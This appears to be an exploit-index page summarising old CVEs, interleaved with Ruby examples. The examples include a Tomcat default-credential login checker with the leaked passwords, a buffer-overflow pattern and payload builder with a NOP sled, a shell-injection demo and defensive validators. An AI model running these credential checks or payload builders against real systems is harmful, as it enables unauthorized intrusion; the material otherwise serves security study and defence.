466 exploits Active since Mar 1998
CVE-2010-0557 METASPLOIT ruby SCANNER
IBM Cognos Express 9.0 - Unauthenticated Denial of Service via Hardcoded Credentials
IBM Cognos Express 9.0 allows attackers to obtain unspecified access to the Tomcat Manager component, and cause a denial of service, by leveraging hardcoded credentials.
CVE-2009-4189 METASPLOIT ruby SCANNER
HP Operations Manager - Remote Code Execution via Default Credentials and File Upload
HP Operations Manager has a default password of OvW*busr1 for the ovwebusr account, which allows remote attackers to execute arbitrary code via a session that uses the manager role to conduct unrestricted file upload attacks against the /manager servlet in the Tomcat servlet container. NOTE: this might overlap CVE-2009-3099 and CVE-2009-3843.
CVE-2009-3843 METASPLOIT ruby SCANNER
HP Operations Manager 8.10 - Unauthenticated Remote Code Execution via Tomcat Manager Upload
HP Operations Manager 8.10 on Windows contains a "hidden account" in the XML file that specifies Tomcat users, which allows remote attackers to conduct unrestricted file upload attacks, and thereby execute arbitrary code, by using the org.apache.catalina.manager.HTMLManagerServlet class to make requests to manager/html/upload.
CVE-2009-3548 METASPLOIT ruby SCANNER
Apache Tomcat 5.5.0-5.5.28 and 6.0.0-6.0.20 - Unauthenticated Privilege Escalation via Default Blank Admin Password
The Windows installer for Apache Tomcat 6.0.0 through 6.0.20, 5.5.0 through 5.5.28, and possibly earlier versions uses a blank default password for the administrative user, which allows remote attackers to gain privileges.
CVE-2009-4188 METASPLOIT ruby SCANNER
HP Operations Dashboard - Unauthenticated Remote Code Execution via Default j2deployer Credentials
HP Operations Dashboard has a default password of j2deployer for the j2deployer account, which allows remote attackers to execute arbitrary code via a session that uses the manager role to conduct unrestricted file upload attacks against the /manager servlet in the Tomcat servlet container. NOTE: this might overlap CVE-2009-3098.
CVE-2010-4094 METASPLOIT ruby SCANNER
IBM Rational Quality Manager and Rational Test Lab Manager - Remote Code Execution via Default Tomcat ADMIN Password
The Tomcat server in IBM Rational Quality Manager and Rational Test Lab Manager has a default password for the ADMIN account, which makes it easier for remote attackers to execute arbitrary code by leveraging access to the manager role. NOTE: this might overlap CVE-2009-3548.
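The six entries above share one root cause: a Tomcat manager role reachable with a vendor-supplied default credential. The checker below is an added example written for this page, not code from Metasploit or from any of the vendors. It takes the credential pairs that appear in the entries above (admin with a blank password for the Tomcat Windows installer, where the username "admin" is an assumption because the entry only states that the password is blank; ovwebusr/OvW*busr1; j2deployer/j2deployer), sends them as HTTP Basic credentials to /manager/html, and classifies the response. The page-body marker used to confirm manager access is assumed from the stock manager UI. The IBM entries do not disclose their passwords, so they are not included.

```ruby
require 'net/http'
require 'uri'

# Default Tomcat manager credentials taken from the entries above. The username
# for the Tomcat Windows installer case is assumed to be "admin"; the entry only
# states that the administrative user's password is blank.
TOMCAT_DEFAULT_CREDS = [
  ['admin',      '',           'CVE-2009-3548 Apache Tomcat Windows installer'],
  ['ovwebusr',   'OvW*busr1',  'CVE-2009-4189 HP Operations Manager'],
  ['j2deployer', 'j2deployer', 'CVE-2009-4188 HP Operations Dashboard']
].freeze

# Marker expected in the manager page body; assumed from the stock manager UI.
MANAGER_MARKER = 'Tomcat Web Application Manager'.freeze

# HTTP Basic credentials: base64(user ":" password) with no line wrapping.
def basic_auth_header(user, pass)
  'Basic ' + ["#{user}:#{pass}"].pack('m0')
end

# Classify a /manager/html response. Tomcat answers 401 to wrong credentials,
# 403 when the account exists but lacks the manager role, and 200 with the
# manager page when the role is granted.
def classify_manager_response(code, body)
  case code
  when 200 then body.include?(MANAGER_MARKER) ? :manager_access : :unexpected_200
  when 401 then :bad_credentials
  when 403 then :no_manager_role
  else :other
  end
end

# Try every default pair against one host and return one result per pair.
# This is the only function that touches the network.
def check_tomcat_defaults(base_url, path: '/manager/html', timeout: 5)
  uri = URI.join(base_url, path)
  http = Net::HTTP.new(uri.host, uri.port)
  http.use_ssl = (uri.scheme == 'https')
  http.open_timeout = http.read_timeout = timeout
  TOMCAT_DEFAULT_CREDS.map do |user, pass, source|
    req = Net::HTTP::Get.new(uri.request_uri)
    req['Authorization'] = basic_auth_header(user, pass)
    res = http.request(req)
    { user: user, source: source,
      result: classify_manager_response(res.code.to_i, res.body.to_s) }
  end
end

# Usage: TOMCAT_TARGET=http://10.0.0.5:8080 ruby tomcat_defaults.rb
if ENV['TOMCAT_TARGET']
  check_tomcat_defaults(ENV['TOMCAT_TARGET']).each do |r|
    puts format('%-16s %-12s %s', r[:result], r[:user], r[:source])
  end
end
```

A 403 is worth reporting separately: it means the default account still exists and only the role assignment has been tightened, which is a weaker fix than removing the account. Run this only against hosts you are authorized to test.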
CVE-2009-20007 EXPLOITDB CRITICAL ruby WORKING POC
Talkative IRC v0.4.4.16 - Remote Stack-Based Buffer Overflow via Oversized Server Response
Talkative IRC v0.4.4.16 is vulnerable to a stack-based buffer overflow when processing specially crafted response strings sent to a connected client. An attacker can exploit this flaw by sending an overly long message that overflows a fixed-length buffer, potentially leading to arbitrary code execution in the context of the vulnerable process. This vulnerability is exploitable remotely and does not require authentication.
CVE-2009-20005 EXPLOITDB CRITICAL ruby WORKING POC
InterSystems Caché 2009.1 - Stack-Based Buffer Overflow via Oversized UtilConfigHome.csp Argument
A stack-based buffer overflow exists in the UtilConfigHome.csp endpoint of InterSystems Caché 2009.1. The vulnerability is triggered by sending a specially crafted HTTP GET request containing an oversized argument to the .csp handler. Due to insufficient bounds checking, the input overflows a stack buffer, allowing an attacker to overwrite control structures and execute arbitrary code. It is unknown whether this vulnerability was patched, and the affected version range remains undefined.
CVE-2010-5323 EXPLOITDB ruby WORKING POC
Novell ZENworks Configuration Management 10 <10.3 - Remote Code Execution via Path Traversal in UploadServlet filename Parameter
Directory traversal vulnerability in UploadServlet in the Remote Management component in Novell ZENworks Configuration Management (ZCM) 10 before 10.3 allows remote attackers to execute arbitrary code via a crafted WAR pathname in the filename parameter in conjunction with WAR content in the POST data, a different vulnerability than CVE-2010-5324.
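The ZENworks entry above is the classic shape of an upload traversal: the server trusts a client-supplied filename and writes the POST body wherever that name resolves, so a WAR dropped into a webapps directory is deployed and executed. The validator below is an added example, not Novell's code and not the Metasploit module; it shows the check a servlet of that kind should have made. The storage policy (uploads kept flat in one directory, plain .war names only) is an assumption chosen for the example. The decision is made on the resolved path rather than on the raw string, so "..", absolute paths and backslash separators are all caught by the same comparison.

```ruby
class UnsafeFilename < StandardError; end

# Policy assumed for this example: uploads are stored flat in upload_root and
# must be plain .war names made of letters, digits, "_" or "-".
ALLOWED_NAME = /\A[A-Za-z0-9_-]+\.war\z/

# Resolve a client-supplied filename inside upload_root and return the absolute
# path, or raise UnsafeFilename. The decision is made on the *resolved* path,
# not on the raw string, so "..", absolute paths and backslash separators are
# all handled by the same containment check.
def safe_upload_path(upload_root, filename)
  root = File.expand_path(upload_root)
  name = filename.to_s
  raise UnsafeFilename, 'empty filename' if name.empty?
  # File.expand_path would expand a leading "~" to a home directory; refuse it.
  raise UnsafeFilename, 'home-relative name' if name.start_with?('~')
  # Treat backslashes as separators too (the component also ran on Windows).
  name = name.gsub('\\', '/')
  candidate = File.expand_path(name, root) # collapses ".." and "."
  unless candidate.start_with?(root + '/')
    raise UnsafeFilename, "#{filename.inspect} resolves outside #{root}"
  end
  rel = candidate[(root.length + 1)..]
  raise UnsafeFilename, "#{rel.inspect} is not an allowed .war name" unless rel.match?(ALLOWED_NAME)
  candidate
end

# Convenience for a request handler: true/false instead of an exception.
def upload_name_ok?(upload_root, filename)
  safe_upload_path(upload_root, filename)
  true
rescue UnsafeFilename
  false
end
```

A name such as "x/../app.war" is accepted because it resolves inside the root; rejecting on the presence of ".." would be a weaker, pattern-based check that misses encodings the containment test handles. The allowlist on the final component is the second layer: even a path inside the root must not reach a subdirectory the deployer watches.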
CVE-2010-20103 EXPLOITDB CRITICAL ruby WORKING POC
ProFTPD 1.3.3c - Unauthenticated Remote Code Execution via Hidden FTP Command
A malicious backdoor was embedded in the official ProFTPD 1.3.3c source tarball distributed between November 28 and December 2, 2010. The backdoor implements a hidden FTP command trigger that, when invoked, causes the server to execute arbitrary shell commands with root privileges. This allows remote, unauthenticated attackers to run any OS command on the FTP server host.
CVSS 9.8
CVE-2010-20059 EXPLOITDB CRITICAL ruby WORKING POC
FreeNAS 0.7.2 <revision 5543 - Unauthenticated Command Execution via exec_raw.php cmd Parameter
FreeNAS 0.7.2 prior to revision 5543 includes an unauthenticated command-execution backdoor in its web interface. The exec_raw.php script exposes a cmd parameter that is passed directly to the underlying shell without sanitization.
CVE-2008-20001 EXPLOITDB HIGH ruby WORKING POC
activePDF WebGrabber 3.8.2.0 - Stack-Based Buffer Overflow in APWebGrb.ocx GetStatus() ActiveX Method
activePDF WebGrabber version 3.8.2.0 contains a stack-based buffer overflow vulnerability in the GetStatus() method of the APWebGrb.ocx ActiveX control. By passing an overly long string to this method, a remote attacker can execute arbitrary code in the context of the vulnerable process. Although the control is not marked safe for scripting, exploitation is possible via crafted HTML content in Internet Explorer under permissive security settings.
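The three stack overflows on this page (Talkative IRC, InterSystems Caché and activePDF WebGrabber) are all triggered by an overly long string, and the first practical step in working any of them is finding how many bytes sit between the start of the buffer and the saved return address. The helpers below are an added example written for this page, not code from the listed exploits or from Metasploit; they reproduce the cyclic-pattern technique those tools use, then assemble a payload once the offset is known. The return address and shellcode passed to build_stack_payload are placeholders, and the little-endian packing assumes the 32-bit x86 targets these advisories concern.

```ruby
UPPER = ('A'..'Z').to_a.freeze
LOWER = ('a'..'z').to_a.freeze
DIGIT = ('0'..'9').to_a.freeze
MAX_PATTERN = UPPER.size * LOWER.size * DIGIT.size * 3 # 20280 bytes before it repeats

# Non-repeating "Aa0Aa1Aa2..." pattern: each 3-byte triplet occurs once within
# MAX_PATTERN bytes, so a 4-byte register value read from a crash maps to one offset.
def pattern_create(length)
  raise ArgumentError, "length #{length} exceeds #{MAX_PATTERN}" if length > MAX_PATTERN
  out = String.new
  UPPER.each do |u|
    LOWER.each do |l|
      DIGIT.each do |d|
        out << u << l << d
        return out[0, length] if out.length >= length
      end
    end
  end
  out
end

# Offset of a crash value inside the pattern. Accepts the 4 bytes as a string
# ("Aa3A") or as the 32-bit register value shown by the debugger (0x41336141),
# packed little-endian as on x86. Returns nil if the value is not in the pattern.
def pattern_offset(pattern, value)
  needle = value.is_a?(Integer) ? [value].pack('V') : value.to_s
  pattern.index(needle)
end

# Once the offset is known: filler up to the saved return address, the
# overwrite itself, a NOP sled and the payload. ret_addr is a placeholder here;
# the real value comes from the target binary. Everything is built as raw bytes.
def build_stack_payload(offset, ret_addr, shellcode, nop_len: 16)
  ('A' * offset).b + [ret_addr].pack('V') + ("\x90".b * nop_len) + shellcode.b
end

# Worked use: a crash with EIP = 0x41336141 after sending pattern_create(100)
# means the return address begins 9 bytes into the buffer.
CRASH_OFFSET = pattern_offset(pattern_create(100), 0x41336141)
```

The same pattern is what you would place in the IRC server's response string, in the oversized .csp argument, or in the string handed to GetStatus(); the only thing that changes per target is the transport around it.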
CVE-2008-0926 METASPLOIT ruby WORKING POC
Novell eDirectory <=8.7.3.10 and 8.8.x <8.8.2 - Unauthenticated Denial of Service and Arbitrary File Read via eMBox SOAP Interface
The SOAP interface to the eMBox module in Novell eDirectory 8.7.3.9 and earlier, and 8.8.x before 8.8.2, relies on client-side authentication, which allows remote attackers to bypass authentication via requests for /SOAP URIs, and cause a denial of service (daemon shutdown) or read arbitrary files. NOTE: it was later reported that 8.7.3.10 (aka 8.7.3 SP10) is also affected.
CVE-2008-3466 METASPLOIT ruby WORKING POC
Microsoft Host Integration Server 2000, 2004, 2006 - Unauthenticated Remote Code Execution via SNA RPC Message
Microsoft Host Integration Server (HIS) 2000, 2004, and 2006 does not limit RPC access to administrative functions, which allows remote attackers to bypass authentication and execute arbitrary programs via a crafted SNA RPC message using opcode 1 or 6 to call the CreateProcess function, aka "HIS Command Execution Vulnerability."
CVE-2008-0244 METASPLOIT ruby WORKING POC
SAP MaxDB < 7.6.3_build_007 - Remote Command Execution via Shell Metacharacters in exec_sdbinfo
SAP MaxDB 7.6.03 build 007 and earlier allows remote attackers to execute arbitrary commands via "&&" and other shell metacharacters in exec_sdbinfo and other unspecified commands, which are executed when MaxDB invokes cons.exe.
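The MaxDB entry above and the FreeNAS exec_raw.php entry earlier on this page are the two faces of the same bug: an attacker-controlled string reaches a shell, so "&&", ";" and friends turn one argument into several commands. The snippet below is an added example, not SAP's, FreeNAS's or Metasploit's code. It uses echo as a stand-in for cons.exe/sdbinfo so that it runs anywhere, shows the vulnerable interpolation next to the two fixes (argv form, then an allowlist on top of it), and demonstrates each with a constructed injection string. The database-name pattern in DB_NAME is an assumed policy, not MaxDB's real grammar.

```ruby
require 'open3'

# Shell metacharacters that turn one argument into several commands.
SHELL_META = /[;&|`$<>(){}\n\r'"\\]/

# Vulnerable pattern: the argument is interpolated into one command string, so
# Ruby hands it to /bin/sh and "x && whoami" becomes two commands. Kept here
# only to show the behaviour; never use it with untrusted input.
def vulnerable_exec(command, arg)
  out, _status = Open3.capture2e("#{command} #{arg}")
  out
end

# First fix: argv form. No shell is involved, so metacharacters stay literal
# and are passed to the program as part of a single argument.
def argv_exec(command, arg)
  out, _status = Open3.capture2e(command, arg)
  out
end

# Second fix, layered on the first: an allowlist for the argument. The pattern
# is an assumed policy for a database name; adjust it to the real grammar.
DB_NAME = /\A[A-Za-z0-9_]{1,32}\z/

def hardened_exec(command, arg)
  raise ArgumentError, "rejected argument #{arg.inspect}" unless arg.match?(DB_NAME)
  argv_exec(command, arg)
end

# Quick triage helper for log review or input auditing.
def shell_meta?(arg)
  arg.match?(SHELL_META)
end

# Constructed injection string: in the vulnerable path the second command runs.
INJECTION = 'hello; echo INJECTED'.freeze
```

Run vulnerable_exec('echo', INJECTION) and you get two lines, "hello" and "INJECTED", because sh executed both commands; argv_exec('echo', INJECTION) prints the string back untouched. Keep the allowlist even when you use argv form: a program such as cons.exe may itself interpret option-like arguments, and argv form does nothing about that.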
CVE-2008-5448 METASPLOIT ruby WORKING POC
Oracle Secure Backup 10.2.0.2 - Unspecified Remote Vulnerability Affecting Confidentiality, Integrity and Availability
Unspecified vulnerability in the Oracle Secure Backup component in Oracle Secure Backup 10.2.0.2 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than CVE-2008-5444 and CVE-2008-5449.
CVE-2010-0904 METASPLOIT ruby WORKING POC
Oracle Secure Backup 10.3.0.1 - Unspecified Remote Vulnerability Affecting Integrity
Unspecified vulnerability in Oracle Secure Backup 10.3.0.1 allows remote attackers to affect integrity via unknown vectors.
CVE-2009-1977 METASPLOIT ruby WORKING POC
Oracle Secure Backup 10.2.0.3 - Unspecified Remote Vulnerability (Reported Authentication Bypass via login.php username Parameter)
Unspecified vulnerability in the Oracle Secure Backup component in Oracle Secure Backup 10.2.0.3 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors. NOTE: the previous information was obtained from the July 2009 Oracle CPU. Oracle has not commented on claims from an independent researcher that this vulnerability allows attackers to bypass authentication via unknown vectors involving the username parameter and login.php.
CVE-2004-0795 METASPLOIT ruby WORKING POC
IBM DB2 Universal Database 8.1 - Local Privilege Escalation via DB2REMOTECMD Named Pipe
DB2 8.1 remote command server (DB2RCMD.EXE) executes the db2rcmdc.exe program as the db2admin administrator, which allows local users to gain privileges via the DB2REMOTECMD named pipe.
CVE-2008-2157 METASPLOIT ruby WORKING POC
EMC AlphaStor 3.1 SP1 - Remote Code Execution via TCP Port 3500
robotd in the Library Manager in EMC AlphaStor 3.1 SP1 for Windows allows remote attackers to execute arbitrary commands via an unspecified string field in a packet to TCP port 3500.
CVE-2008-1562 METASPLOIT ruby WORKING POC
Wireshark 0.99.2-0.99.8 - Denial of Service via Malformed LDAP Packet
The LDAP dissector in Wireshark (formerly Ethereal) 0.99.2 through 0.99.8 allows remote attackers to cause a denial of service (application crash) via a malformed packet, a different vulnerability than CVE-2006-5740.
CVE-2006-0900 METASPLOIT ruby WORKING POC
FreeBSD 6.0 - Denial of Service via NFS Mount Request
nfsd in FreeBSD 6.0 kernel allows remote attackers to cause a denial of service via a crafted NFS mount request, as demonstrated by the ProtoVer NFS test suite.
CVE-2006-5614 METASPLOIT ruby WORKING POC
Microsoft Windows NAT Helper Components - Denial of Service via Malformed DNS Query
Microsoft Windows NAT Helper Components (ipnathlp.dll) on Windows XP SP2, when Internet Connection Sharing is enabled, allows remote attackers to cause a denial of service (svchost.exe crash) via a malformed DNS query, which results in a null pointer dereference.
CVE-2012-2626 METASPLOIT ruby WORKING POC
Plixer Scrutinizer < 9.5.0 - Unauthenticated Administrative Account Creation via admin.cgi userprefs Action
cgi-bin/admin.cgi in the web console in Plixer Scrutinizer (aka Dell SonicWALL Scrutinizer) before 9.5.0 does not require token authentication, which allows remote attackers to add administrative accounts via a userprefs action.